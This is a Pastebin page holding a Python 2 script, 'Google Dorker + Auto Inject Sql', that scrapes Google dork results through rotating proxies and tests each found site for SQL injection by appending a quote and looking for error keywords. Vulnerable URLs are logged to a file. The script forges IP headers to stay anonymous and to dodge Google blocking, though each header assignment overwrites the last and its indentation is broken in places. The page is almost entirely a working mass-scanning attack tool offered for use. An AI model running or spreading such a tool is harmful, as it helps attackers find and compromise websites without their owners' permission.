API tools faq
paste
Advertisement
AbdulMuttaqin

Google Dorker + Auto Inject Sql

AbdulMuttaqin
Sep 2nd, 2018
890
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.92 KB | None | 0 0
raw download clone embed print report
  1. import urllib2,urllib,sys,re,random,string,time,threading
  2. try:
  3.     dorklist=sys.argv[1]
  4.     proxylist=sys.argv[2]
  5. except:
  6.     print "Usage: "+sys.argv[0]+" [DORK LIST] [PROXY LIST]" #Simple usage for the skids out ther ^_^
  7.     exit(1)
  8. def randomIP():
  9.     return '.'.join('%s'%random.randint(0, 255) for i in range(4)) #Generate random IP for false headers
  10. def test(target,testchar, proxy):
  11.     try:
  12.         opener = urllib2.build_opener(proxy)
  13.         opener.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
  14.         opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
  15.         opener.addheaders = [('REMOTE-ADDR',randomIP())]
  16.         opener.addheaders = [('VIA',randomIP())]
  17.         opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
  18.         keywords=["SQL", "Warning", "Syntax"]
  19.         print "[+] Trying "+target+testchar
  20.         try:
  21.             resp=opener.open(target+testchar,timeout=5)
  22.         except Exception, e:
  23.             print "[-] "+str(e)
  24.             return
  25.         for keyword in keywords:
  26.             try:
  27.                 for x in resp.read().split(" "):
  28.                     if keyword in x:
  29.                         print "[+] Found keyword '"+keyword+"' at "+target+testchar
  30.                         f=open("SQLi_Vulnerable.txt","a")
  31.                         f.write(target+testchar+"\r\n")
  32.                         f.close()
  33.                         break
  34.             except urllib2.HTTPError as e:
  35.                 print "[-] "+str(e)
  36.                 pass
  37.     except urllib2.URLError as e:
  38.         print "[-] "+str(e)
  39.         pass
  40. def spyder(dork,page):
  41.         proxies = open(proxylist, "r").read().split("\n")
  42.         proxy = random.choice(proxies).split(" ")[0]
  43.         proxy = urllib2.ProxyHandler({'http': proxy})
  44.     opener = urllib2.build_opener(proxy)
  45.     opener.addheaders = [('User-agent','Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
  46.     opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
  47.     opener.addheaders = [('REMOTE-ADDR',randomIP())]
  48.     opener.addheaders = [('VIA',randomIP())]
  49.     opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
  50.     opener.addheaders = [('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
  51.     opener.addheaders = [('Accept-Language','en-US,en;q=0.5')]
  52.     opener.addheaders = [('Accept-Encoding','gzip, deflate')]
  53.     opener.addheaders = [('Referer',dork)]
  54.     try:
  55.         searchresults=opener.open(dork,timeout=5).read()
  56.     except Exception, e:
  57.         print "[-] "+str(e)
  58.         print "[-] Bot has been blocked from google!!! Switching proxy."
  59.         spyder(dork, page)
  60.     try:
  61.         searchresults
  62.     except NameError:
  63. #       print "[-] Variable undefined, re-searching"
  64.         try:
  65.             searchresults=opener.open(dork,timeout=5).read()
  66.         except:
  67.             try:
  68.                 searchresults=opener.open(dork,timeout=5).read()
  69.             except:
  70.                 print "[-] Bot has been blocked from google!!! Change VPN server or proxy! Press enter to continue"
  71.                 raw_input()
  72.                 spyder(dork, page)
  73.     else:
  74.         pass
  75. #       print "[+] Variable defined, continuing search"
  76.  
  77.     for i in re.findall('''href=["'](.[^"']+)["']''',searchresults, re.I):
  78.         i=i.replace("amp;",'')
  79.         if i.endswith("start="+str(page)+"0&sa=N") and i.startswith("/search"):
  80.             dorkurl="https://encrypted.google.com"+i
  81.             print "[+] Searching next page "+dorkurl
  82.             spyder(dorkurl,page)
  83.             page+=1
  84.         i=urllib2.unquote(i).decode('utf8')
  85.         try:
  86.             i=i.split("?q=")[1]
  87.             i=i.split("&sa=")[0]
  88.             if i.startswith("http"):
  89.                     if i.startswith("http://accounts.google.com"):
  90.                         continue
  91.                     elif i.startswith("http://www.google.com"):
  92.                         continue
  93.                     elif i.startswith("http://encrypted.google.com"):
  94.                         continue
  95.                     elif i.startswith("http://webcache.googleusercontent.com"):
  96.                         continue
  97.                     elif i!=dork.decode('utf8'):
  98.                         threading.Thread(target=test, args=(i,"'",proxy,)).start()
  99.         except:
  100.             continue
  101. f=open(dorklist,"r")
  102. for dork in f.read().split("\n"):
  103.     print "[+] Searching for dork: '"+dork+"'"
  104.     spyder('https://encrypted.google.com/search?hl=en&q='+urllib.quote_plus(dork),1)
  105. f.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!